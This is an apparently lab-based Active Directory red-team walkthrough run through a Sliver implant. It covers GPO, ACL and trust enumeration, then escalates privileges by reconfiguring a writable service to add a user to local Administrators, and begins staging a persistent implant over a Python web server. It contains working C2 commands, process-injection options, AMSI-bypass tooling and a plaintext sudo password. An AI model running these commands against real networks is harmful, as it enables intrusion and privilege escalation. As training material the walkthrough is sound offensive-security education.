Now copy the GPO's name, the {GUID} part of the gplink value above (without the square brackets, the semicolon or anything after it), and use it with StandIn to find which GPO it corresponds to, using the LDAP query (&(objectCategory=groupPolicyContainer)(|(name={7478F170-6A0C-490C-B355-9E4618BC785D}))). The number after the semicolon is the link's option bitmask: 1 means the link is disabled, 2 means it is enforced, and 0 (as here) means the GPO is linked normally. Use --filter to return only the displayname property, i.e. the friendly name of the applied GPO.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(&(objectCategory=groupPolicyContainer)(|(name={7478F170-6A0C-490C-B355-9E4618BC785D})))" --filter displayname'

[*] Output:
[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local
[+] LDAP search result count : 1
|_ Result limit : 50
[?] Iterating result properties
|_ Applying property filter => displayname

[?] Object : CN={7478F170-6A0C-490C-B355-9E4618BC785D}
Path : LDAP://CN={7478F170-6A0C-490C-B355-9E4618BC785D},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
[+] displayname
|_ Students

Using ADSearch
To enumerate the GPOs applied on the StudentMachines OU with ADSearch, first read the OU's gplink attribute: search with the filter (OU=StudentMachines) and select only the gplink attribute with --attributes, as follows.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(OU=StudentMachines)" --attributes gplink'

[*] Output:

[*] No domain supplied. This PCs domain will be used instead


[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[+] gplink : [LDAP://cn={7478F170-6A0C-490C-B355-9E4618BC785D},cn=policies, cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]

Now copy the GPO's name, the {GUID} part of the gplink value above (without the square brackets, the semicolon or anything after it), and use it with ADSearch to find which GPO it corresponds to, using the LDAP query (&(objectCategory=groupPolicyContainer)(|(name={7478F170-6A0C-490C-B355-9E4618BC785D}))). Use --attributes to return only the displayname property, i.e. the friendly name of the applied GPO.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(&(objectCategory=groupPolicyContainer)(|(name={7478F170-6A0C-490C-B355-9E4618BC785D})))" --attributes displayname'

[*] Output:

[*] No domain supplied. This PCs domain will be used instead


[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[+] displayname : Students
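Copying the GUID out of gplink by hand works for a single link, but an OU can carry several links, and the option value after the semicolon decides whether a link is disabled or enforced. The following is an added example, not part of the lab manual and not code from StandIn or ADSearch: it parses a gPLink value and builds the same groupPolicyContainer filter used above for every linked GPO at once. The sample value is the one returned for OU=StudentMachines above with a second, constructed link appended (the Default Domain Policy GUID is the well-known one); the disabled/enforced bit meanings are from MS-GPOL.

```python
import re

# gPLink value returned for OU=StudentMachines on this page, with a second,
# constructed link appended (option 2 = enforced) to show a multi-link value.
SAMPLE_GPLINK = (
    "[LDAP://cn={7478F170-6A0C-490C-B355-9E4618BC785D},cn=policies, cn=system,"
    "DC=dollarcorp,DC=moneycorp,DC=local;0]"
    "[LDAP://cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=policies,cn=system,"
    "DC=dollarcorp,DC=moneycorp,DC=local;2]"
)

# One link: "[LDAP://<dn>;<options>]"; the DN may contain spaces but not ';' or ']'.
_LINK_RE = re.compile(r"\[LDAP://([^;\]]+);(\d+)\]", re.IGNORECASE)
_GUID_RE = re.compile(r"\{([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})\}", re.IGNORECASE)

# gPLink option bits (MS-GPOL): 0x1 = link disabled, 0x2 = link enforced.
LINK_DISABLED = 0x1
LINK_ENFORCED = 0x2


def parse_gplink(value):
    """Split a gPLink attribute into its individual links, in string order."""
    links = []
    for dn, options in _LINK_RE.findall(value or ""):
        dn = dn.strip()
        guid = _GUID_RE.search(dn)
        if not guid:  # malformed link: skip rather than guess
            continue
        opts = int(options)
        links.append({
            "guid": guid.group(1).upper(),
            "dn": dn,
            "disabled": bool(opts & LINK_DISABLED),
            "enforced": bool(opts & LINK_ENFORCED),
        })
    return links


def gpo_name_filter(links, skip_disabled=True):
    """Build the (&(objectCategory=groupPolicyContainer)(|(name={GUID})...)) filter
    used in the lab, covering every link at once. Returns None if nothing is linked."""
    terms = "".join(
        f"(name={{{link['guid']}}})"
        for link in links
        if not (skip_disabled and link["disabled"])
    )
    if not terms:
        return None
    return f"(&(objectCategory=groupPolicyContainer)(|{terms}))"


if __name__ == "__main__":
    parsed = parse_gplink(SAMPLE_GPLINK)
    for link in parsed:
        state = "enforced" if link["enforced"] else ("disabled" if link["disabled"] else "normal")
        print(link["guid"], state)
    print(gpo_name_filter(parsed))
```

The resulting filter can be passed straight to StandIn --ldap or ADSearch --search with --filter/--attributes displayname, exactly as in the single-GPO commands above.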

Learning Objective 3
Enumerate following for the dollarcorp domain:

• ACL for the Domain Admins group

• All modify rights/permissions for the studentX

ACL for the Domain Admins group


Using ADCollector
Enumerating ACLs through raw LDAP queries is cumbersome because the permissions live in the nTSecurityDescriptor attribute, a binary security descriptor that has to be parsed programmatically rather than read from a shell. ADSearch and StandIn do not offer full ACL enumeration over an object and the groups that hold rights on it, so we use ADCollector, which resolves the DACL into organized, structured output and extracts the useful entries.

Let’s enumerate the DACL of the Domain Admins group with ADCollector: pass the group's Distinguished Name to the --DACL argument.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADCollector.exe' '--DACL "CN=DOMAIN ADMINS,CN=USERS,DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL"'

[*] Output:
[ADCollector banner] v3.0.1 by dev2null

[-] DACL on CN=DOMAIN ADMINS,CN=USERS,DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL:

- CN=DOMAIN ADMINS,CN=USERS,DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
Authenticated Users        All properties (GenericRead [Allow])
Local System               All properties (GenericAll [Allow])
BUILTIN\Administrators     CreateChild, DeleteChild, Self, WriteProperty, [ExtendedRight: All [Allow]], Delete, GenericRead, WriteDacl, WriteOwner
mcorp\Enterprise Admins    CreateChild, DeleteChild, Self, WriteProperty, [ExtendedRight: All [Allow]], GenericRead, WriteDacl, WriteOwner
dcorp\Domain Admins        CreateChild, DeleteChild, Self, WriteProperty, [ExtendedRight: All [Allow]], GenericRead, WriteDacl, WriteOwner, Owner

[.....snip.....]

Server (ReadProperty, WriteProperty [Allow])
dcorp\Cert Publishers      X509-Cert (ReadProperty, WriteProperty [Allow])

[*] Done!

ADCollector:
--DACL Enumerate DACL on the target object (use DistinguishedName)

All modify rights/permissions for studentX
Using ADCollector
To check which modify rights (or equivalent permissions) dcorp\studentX holds over other objects, use ADCollector's --ACLScan argument followed by the identity to enumerate.

Note: ADCollector also reports interesting DACL entries granted to the groups the user belongs to (dcorp\studentX is a member of the RDPUsers group), which is why the GenericAll on ControlXUser below is attributed to dcorp\RDPUsers.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADCollector.exe' '--ACLScan "studentX"'

[*] Output

[-] Interesting ACL for studentX:

- DC=dollarcorp,DC=moneycorp,DC=local
Authenticated Users        Enable-Per-User-Reversibly-Encrypted-Password
                           Update-Password-Not-Required-Bit
                           Unexpire-Password

- CN=ControlXUser,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
dcorp\RDPUsers             All properties (GenericAll)
[...............snip.................]

[*] Done!

Learning Objective 4
• Enumerate all domains in the moneycorp.local forest.

• Map the trusts of the dollarcorp.moneycorp.local domain.

• Map External trusts in moneycorp.local forest.

• Identify external trusts of dollarcorp domain.

• Can you enumerate trusts for a trusting forest?

Enumerate all domains in the moneycorp.local forest


Using DSQuery
Let’s enumerate all domains in the moneycorp forest using dsquery. To do so we need:
• an LDAP search with the Search Base CN=Partitions,CN=Configuration,DC=moneycorp,DC=local (the Partitions container of the forest-wide Configuration naming context holds a crossRef object for every partition)

• the LDAP filter (nETBIOSName=*) (only domain partitions carry a NetBIOS name, so this excludes the schema, configuration and application partitions)

• the attribute nCName, the distinguished name of each domain naming context

Because this needs a custom search base, we use dsquery; StandIn and ADSearch do not support custom search bases.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/dsquery.exe' '* "CN=Partitions,CN=Configuration,DC=moneycorp,DC=local" -filter "(nETBIOSName=*)" -attr ncname'

[*] Output:
Records Found: 3

ncname
DC=dollarcorp,DC=moneycorp,DC=local
DC=moneycorp,DC=local
DC=us,DC=dollarcorp,DC=moneycorp,DC=local

DONE

Map the trusts of the dollarcorp.moneycorp.local domain
Using ADSearch
We can use ADSearch or StandIn with the raw LDAP query (objectClass=trustedDomain), which returns every trustedDomain object, i.e. every trust the domain has, together with its properties. Select only the trust-related attributes with --attributes. Here we use ADSearch, with --json for structured output.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '-d dollarcorp.moneycorp.local --search "(objectClass=trustedDomain)" --attributes cn,flatName,name,objectClass,trustAttributes,trustDirection,trustPartner --json'

[*] Output:
[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 3
[
  {
    "cn": "moneycorp.local",
    "flatName": "mcorp",
    "name": "moneycorp.local",
    "objectClass": [
      "top",
      "leaf",
      "trustedDomain"
    ],
    "trustAttributes": 32,
    "trustDirection": 3,
    "trustPartner": "moneycorp.local"
  },
  {
    "cn": "us.dollarcorp.moneycorp.local",
    "flatName": "us",
    "name": "us.dollarcorp.moneycorp.local",
    "objectClass": [
      "top",
      "leaf",
      "trustedDomain"
    ],
    "trustAttributes": 32,
    "trustDirection": 3,
    "trustPartner": "us.dollarcorp.moneycorp.local"
  },
  {
    "cn": "eurocorp.local",
    "flatName": "ecorp",
    "name": "eurocorp.local",
    "objectClass": [
      "top",
      "leaf",
      "trustedDomain"
    ],
    "trustAttributes": 4,
    "trustDirection": 3,
    "trustPartner": "eurocorp.local"
  }
]
To interpret the trust properties (trustAttributes and trustDirection), look up the values in the MS-ADTS documentation:

• trustAttributes: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/e9a2d23c-c31e-4a6f-88a0-6646fdb51a3c

• trustDirection: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/5026a939-44ba-47b2-99cf-386a9e674b04

trustDirection is an enumeration: 0 = disabled, 1 = inbound, 2 = outbound, 3 = bidirectional, so trustDirection = 3 (0x00000003) above means a BiDirectional trust. trustAttributes is a bit mask: 32 (0x20, TRUST_ATTRIBUTE_WITHIN_FOREST) marks the two intra-forest trusts to moneycorp.local and us.dollarcorp.moneycorp.local, while 4 (0x4, TRUST_ATTRIBUTE_QUARANTINED_DOMAIN) on the eurocorp.local trust means SID filtering is enforced in quarantine mode, the default for external trusts.
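Decoding the two numbers by hand gets error-prone as soon as several bits are combined. The following is an added example, not part of the lab manual and not code from ADSearch or StandIn: it decodes trustAttributes and trustDirection for the three records ADSearch returned above (embedded here reduced to the attributes the decoder needs), classifies each trust, and also shows how to build an LDAP filter that tests a single flag with the bitwise matching rule instead of exact equality. The flag names and values are from MS-ADTS; the coarse intra-forest/forest/external classification is the author's own heuristic.

```python
import json

# trustAttributes bits (MS-ADTS 6.1.6.7.9); only the values the author is sure of.
TRUST_ATTRIBUTES = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "QUARANTINED_DOMAIN",  # SID filtering quarantine, default on external trusts
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",
    0x0040: "TREAT_AS_EXTERNAL",
    0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}
TRUST_DIRECTION = {0: "Disabled", 1: "Inbound", 2: "Outbound", 3: "Bidirectional"}
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# The three trustedDomain objects ADSearch returned for dollarcorp above,
# reduced to the attributes the decoder needs.
DCORP_TRUSTS = json.loads("""[
  {"name": "moneycorp.local", "flatName": "mcorp", "trustAttributes": 32, "trustDirection": 3},
  {"name": "us.dollarcorp.moneycorp.local", "flatName": "us", "trustAttributes": 32, "trustDirection": 3},
  {"name": "eurocorp.local", "flatName": "ecorp", "trustAttributes": 4, "trustDirection": 3}
]""")


def decode_attributes(value):
    """Names of the flags set in a trustAttributes value; unknown bits stay visible."""
    names = [name for bit, name in TRUST_ATTRIBUTES.items() if value & bit]
    unknown = value & ~sum(TRUST_ATTRIBUTES)
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:x})")
    return names


def trust_kind(attrs):
    """Coarse classification (author's heuristic): intra-forest, forest, or external."""
    if attrs & 0x0020:
        return "intra-forest"
    if attrs & 0x0008:
        return "forest"
    return "external"


def summarize(trusts):
    """One row per trustedDomain record with the decoded direction, kind and flags."""
    rows = []
    for t in trusts:
        attrs = int(t["trustAttributes"])
        rows.append({
            "partner": t["name"],
            "netbios": t.get("flatName"),
            "direction": TRUST_DIRECTION.get(int(t["trustDirection"]), "Unknown"),
            "kind": trust_kind(attrs),
            "quarantined": bool(attrs & 0x0004),
            "flags": decode_attributes(attrs),
        })
    return rows


def flag_filter(flag, exact=False):
    """LDAP filter for trusts carrying a given trustAttributes flag.
    exact=True reproduces the lab's (trustAttributes=4), which only matches when no
    other bit is set; the default uses LDAP_MATCHING_RULE_BIT_AND, which matches
    any value that has the bit set."""
    if exact:
        return f"(trustAttributes={flag})"
    return f"(trustAttributes:{LDAP_MATCHING_RULE_BIT_AND}:={flag})"


if __name__ == "__main__":
    for row in summarize(DCORP_TRUSTS):
        print(row)
    print(flag_filter(0x0004), "vs", flag_filter(0x0004, exact=True))
```

Feeding the full --json output of ADSearch to summarize() (the extra keys are ignored) gives the same classification for any number of trusts, and flag_filter() produces a search string that can be passed to --search unchanged.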

Map External trusts in moneycorp.local forest


Using ADSearch
From the MS-ADTS values above, an external trust shows up as a trustedDomain object with TRUST_ATTRIBUTE_QUARANTINED_DOMAIN (0x00000004) set: SID filtering in quarantine mode is the default for external (non-forest) trusts, and the flag is not set on intra-forest or forest trusts.

The lab uses the equality filter (trustAttributes=4), which only matches objects whose value is exactly 4. Because trustAttributes is a bit mask, a trust that also carries other flags (for example 0x44, quarantined plus TREAT_AS_EXTERNAL) would be missed; the bitwise filter (trustAttributes:1.2.840.113556.1.4.803:=4) matches any object with that bit set. With the equality filter, we query the moneycorp.local domain with ADSearch as follows.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '-d moneycorp.local --search "(trustAttributes=4)" --attributes cn,flatName,name,objectClass,trustAttributes,trustDirection,trustPartner --json'

[*] Output:

[*] LDAP://DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 0

There are no external cross forest trusts specified for the moneycorp.local domain.

Identify external trusts of dollarcorp domain
Using ADSearch
We can use the same LDAP query with ADSearch to find the external trusts of the dollarcorp.moneycorp.local domain, as follows.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '-d dollarcorp.moneycorp.local --search "(trustAttributes=4)" --attributes cn,flatName,name,objectClass,trustAttributes,trustDirection,trustPartner --json'

[*] Output:

[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[
{
"cn": "eurocorp.local",
"flatName": "ecorp",
"name": "eurocorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustAttributes": 4,
"trustDirection": 3,
"trustPartner": "eurocorp.local"
}
]

Enumerate Trusts of a trusting forest
Using ADSearch
The dollarcorp to eurocorp trust found above is a bidirectional external trust, so we can query the eurocorp forest the same way we queried our own domain: run the (objectClass=trustedDomain) LDAP query with ADSearch against eurocorp.local to map the trusts that eurocorp itself has.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '-d eurocorp.local --search "(objectClass=trustedDomain)" --attributes cn,flatName,name,objectClass,trustAttributes,trustDirection,trustPartner --json'

[*] Output:

[*] LDAP://DC=eurocorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 2
[
{
"cn": "eu.eurocorp.local",
"flatName": "eu",
"name": "eu.eurocorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustAttributes": 32,
"trustDirection": 3,
"trustPartner": "eu.eurocorp.local"
},
{
"cn": "dollarcorp.moneycorp.local",
"flatName": "dcorp",
"name": "dollarcorp.moneycorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustAttributes": 4,
"trustDirection": 3,
"trustPartner": "dollarcorp.moneycorp.local"
}
]

Learning Objective 5
• Exploit a service on dcorp-studentX and elevate privileges to local administrator.

• Identify a machine in the domain where studentX has local administrative access.

• Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 - the
dcorp-ci server.

Enumerating the vulnerable service


Using SharpUp
SharpUp is a C# port of PowerUp. We use it to run its privilege escalation checks with the audit argument, which runs every check even when the current user is already a local administrator.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 180 /mnt/c/AD/Tools/Sharpup.exe audit

[*] sharpup output:

=== SharpUp: Running Privilege Escalation Checks ===

[*] In medium integrity but user is a local administrator- UAC can be bypassed.

[*] Audit mode: running an additional 15 check(s).


[!] Modifiable scheduled tasks were not evaluated due to permissions.

=== Modifiable Folders in %PATH% ===


C:\Python27\

=== Services with Unquoted Paths ===


Service 'AbyssWebServer' (StartMode: Automatic) has executable 'C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service', but 'C:\WebServer\Abyss' is modifable.

Service 'AbyssWebServer' (StartMode: Automatic) has executable 'C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service', but 'C:\WebServer\Abyss Web' is modifable.

=== Modifiable Service Binaries ===


Service 'AbyssWebServer' (State: Running, StartMode: Auto) : C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service

=== Modifiable Services ===


Service 'AbyssWebServer' (State: Running, StartMode: Auto)
Service 'SNMPTRAP' (State: Running, StartMode: Auto)

There are three ways to abuse the AbyssWebServer service, as the output above shows.

1. Unquoted Service Paths

2. Modifiable Service Binaries

3. Modifiable Services

Using Seatbelt and Stracciatella
Seatbelt performs host safety checks useful for both offensive and defensive purposes; we use it to find privilege escalation avenues. We run only the system checks using the -group=System argument.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 180 /mnt/c/AD/Tools/Seatbelt.exe -group=System

[*] seatbelt output:

====== AMSIProviders ======


GUID : {2781761E-28E0-4109-99FE-B9D127C57AFE}
ProviderPath : "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\MpOav.dll"
====== AntiVirus ======
Cannot enumerate antivirus. root\SecurityCenter2 WMI namespace is not available on Windows Servers
====== AppLocker ======

[...........snip...........]

====== Services ======


Non Microsoft Services (via WMI)
Name : AbyssWebServer
DisplayName : Abyss Web Server
Description :
User : LocalSystem
State : Stopped
StartMode : Auto
Type : Own Process
ServiceCommand : C:\WebServer\Abyss Web Server\abyssws.exe -service
BinaryPath : C:\WebServer\Abyss Web Server\abyssws.exe
BinaryPathSDDL : O:BAD:AI(A;ID;FA;;;WD)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)

[...........snip...........]

We can now use Stracciatella to run icacls and check the permissions on the abyssws.exe service binary. Stracciatella is a C# host for a PowerShell runspace (in the style of SharpPick) that starts with AMSI, Constrained Language Mode and Script Block Logging disabled.
[server] sliver (dcorp-std_https) > cd "C:\WebServer\Abyss Web Server"
[*] C:\WebServer\Abyss Web Server

[server] sliver (dcorp-std_https)> execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Stracciatella.exe' '-c "icacls abyssws.exe"'

[*] Output:

abyssws.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

To check the directory permissions that make the unquoted service path abusable, run icacls on the parent directory of the service binary the same way.
[server] sliver (dcorp-std_https)> execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Stracciatella.exe' '-c "icacls C:\WebServer"'

[*] Output:

C:\WebServer NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
             BUILTIN\Administrators:(I)(OI)(CI)(F)
             BUILTIN\Users:(I)(OI)(CI)(RX)
             BUILTIN\Users:(I)(CI)(AD)
             BUILTIN\Users:(I)(CI)(WD)
             CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

The (CI)(AD) and (CI)(WD) entries for BUILTIN\Users mean any user can create subdirectories and files directly in C:\WebServer, which is exactly what the unquoted path abuse needs (planting C:\WebServer\Abyss.exe), while the (I)(F) entry for Everyone on abyssws.exe means the service binary itself can simply be overwritten.
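The two checks above, which paths Windows tries for an unquoted ImagePath and which icacls entries hand a low-privileged principal write access, can be automated. The following is an added example, not part of the manual and not code from SharpUp or Stracciatella: it reproduces the candidate paths SharpUp reported for the AbyssWebServer service and flags the writable entries in the two icacls listings above, which are embedded here as constructed samples. The set of low-privileged principals and the rights counted as "write" are the author's own choice, and the parser assumes the path on the first icacls line contains no spaces.

```python
import re

# Principals that every interactive user on the box effectively holds.
LOW_PRIV = {
    "everyone",
    "users",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# icacls rights that let the holder replace, plant or delete a file or directory
# entry. (I)(OI)(CI)(IO)(NP) are inheritance flags, not rights.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DC", "WDAC", "WO"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# Constructed samples mirroring the two icacls results shown above.
ICACLS_EXE = r"""
abyssws.exe Everyone:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Administrators:(I)(F)
            BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

ICACLS_DIR = r"""
C:\WebServer NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
             BUILTIN\Administrators:(I)(OI)(CI)(F)
             BUILTIN\Users:(I)(OI)(CI)(RX)
             BUILTIN\Users:(I)(CI)(AD)
             BUILTIN\Users:(I)(CI)(WD)
             CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""


def unquoted_candidates(image_path):
    """Executables the Service Control Manager would try, in order, before the
    real one when the ImagePath is unquoted and contains spaces. A quoted path
    is unambiguous and yields no candidates."""
    cmd = image_path.strip()
    if cmd.startswith('"'):
        return []
    tokens = cmd.split(" ")
    # The real image ends at the first token carrying the .exe extension;
    # everything after it is arguments.
    end = next((i for i, t in enumerate(tokens) if t.lower().endswith(".exe")), None)
    if end is None:
        return []
    # Every space before the real image is a cut point, and ".exe" is appended
    # because the truncated name has no extension.
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, end + 1)]


_ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<perms>(?:\([A-Za-z,]*\))+)$")


def parse_icacls(output):
    """Return (path, [(principal, set_of_rights), ...]) from an icacls listing."""
    path, entries = None, []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if path is None:  # first line: "<path> <ACE>"
            path, _, line = line.partition(" ")
        m = _ACE_RE.match(line)
        if not m:
            continue
        groups = re.findall(r"\(([^)]*)\)", m.group("perms"))
        if "DENY" in groups:  # an explicit deny grants nothing
            continue
        rights = {tok for g in groups for tok in g.split(",") if tok and tok not in INHERIT_FLAGS}
        entries.append((m.group("principal"), rights))
    return path, entries


def writable_by_low_priv(output):
    """(path, [(principal, [write rights]), ...]) for entries a low-privileged
    principal can use to modify the object."""
    path, entries = parse_icacls(output)
    hits = [(p, sorted(r & WRITE_RIGHTS)) for p, r in entries
            if p.lower() in LOW_PRIV and r & WRITE_RIGHTS]
    return path, hits


if __name__ == "__main__":
    for cand in unquoted_candidates(r"C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service"):
        print("would be tried first:", cand)
    for sample in (ICACLS_EXE, ICACLS_DIR):
        path, hits = writable_by_low_priv(sample)
        print(path, "->", hits or "no low-privileged write access")
```

Running it reports C:\WebServer\Abyss.exe and C:\WebServer\Abyss Web.exe as the candidates, matching SharpUp's two findings, and flags Everyone (F) on abyssws.exe and BUILTIN\Users (AD, WD) on C:\WebServer; a quoted ImagePath yields no candidates at all, which is why quoting the path is the fix on the defensive side.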

Elevate privileges to local administrator
Using Remote-sc-*
We will abuse the Modifiable Services finding for privilege escalation in two ways.

First, we reconfigure the AbyssWebServer service so that, when it starts, it adds dcorp\studentX to the local Administrators group.

We use Sliver's remote-sc-* commands to stop, reconfigure and start the AbyssWebServer service, the same operations sc.exe performs. These commands are Beacon Object Files run through Sliver's coff-loader extension, so everything executes inside the current implant process: no child process is spawned and nothing is written to disk. Begin by stopping the target service with remote-sc-stop.
[server] sliver (dcorp-std_https) > remote-sc-stop -h
stop service on a windows based system
Usage:
======
remote-sc-stop [flags] hostname service_name
Args:
=====
hostname string hostname to stop service on use "" for local system
service_name string name of service to stop
Flags:
======
-h, --help display help
-t, --timeout int command timeout in seconds (default: 60)

[server] sliver (dcorp-std_https) > remote-sc-stop -t 100 "" 'AbyssWebServer'


[*] Successfully executed remote-sc-stop (coff-loader)
[*] Got output:
stop_service:
hostname:
servicename: AbyssWebServer
SUCCESS.

Reconfigure the AbyssWebServer service so that its binary path adds the current user (dcorp\studentX) to the local Administrators group. The command runs in the service's security context when the Service Control Manager starts it.
[server] sliver (dcorp-std_https) > remote-sc-config -h
configure an existing service

Usage:
======
remote-sc-config [flags] hostname service_name binpath error_mode start_mode
Args:
=====
hostname string hostname to modify service on use "" for local system
service_name string name of service to configure
binpath string New binary path for service
error_mode int new error mode for service binary
0=ignore 1=normal 2=severe 3=critical
start_mode int start mode for service
2=auto 3=demand 4=disable
Flags:
======
-h, --help display help
-t, --timeout int command timeout in seconds (default: 60)

[server] sliver (dcorp-std_https) > remote-sc-config -t 100 "" 'AbyssWebServer' 'C:\windows\system32\net.exe localgroup administrators dcorp\studentX /add' 1 2
[*] Successfully executed remote-sc-config (coff-loader)
[*] Got output:
config_service:
hostname:
servicename: AbyssWebServer
binpath: C:\windows\system32\net.exe localgroup administrators dcorp\studentX /add
ignoremode: 1
startmode: 2
SUCCESS.

Restart the AbyssWebServer service to add dcorp\studentX as a local administrator.


[server] sliver (dcorp-std_https) > remote-sc-start -h
Start service on a windows-based system
Usage:
======
remote-sc-start [flags] hostname service_name
Args:
=====
hostname string hostname to start service on use "" for local system
service_name string name of service to start
Flags:
======
-h, --help display help
-t, --timeout int command timeout in seconds (default: 60)

[server] sliver (dcorp-std_https) > remote-sc-stop -t 100 "" 'AbyssWebServer'

[*] Successfully executed remote-sc-stop (coff-loader)
[*] Got output:
stop_service:
hostname:
servicename: AbyssWebServer
SUCCESS.

[server] sliver (dcorp-std_https) > remote-sc-start -t 100 "" 'AbyssWebServer'
[*] Successfully executed remote-sc-start (coff-loader)
[*] Got output:
start_service failed: 41D
start_service:
hostname:
servicename: AbyssWebServer
StartServiceA failed (41D)

The 0x41D (1053, ERROR_SERVICE_REQUEST_TIMEOUT) is expected: net.exe is not a real service and never reports a running state to the Service Control Manager, so StartServiceA times out after the command has already executed. Confirm the result with net localgroup administrators; the new membership only shows up in tokens created by a fresh logon.

The second way to abuse the AbyssWebServer service is to obtain a high-integrity, persistent Sliver session: replace the service's binary path with a command that downloads and runs a Sliver implant, so the implant starts every time the service does.

Host the shellcode using HFS / a python3 webserver.

wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/Sliver

wsluser@dcorp-studentX:~$ sudo python3 -m http.server 80


[sudo] password for wsluser: WSLToTh3Rescue!
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Reconfigure the service as follows to execute the NtDropper along with the previously generated https
shellcode.
[server] sliver (dcorp-std_https) > remote-sc-stop -t 45 "" AbyssWebServer
[*] Successfully executed remote-sc-stop (coff-loader)
[*] Got output:
stop_service:
hostname:
servicename: AbyssWebServer
Service is already stopped.
SUCCESS.

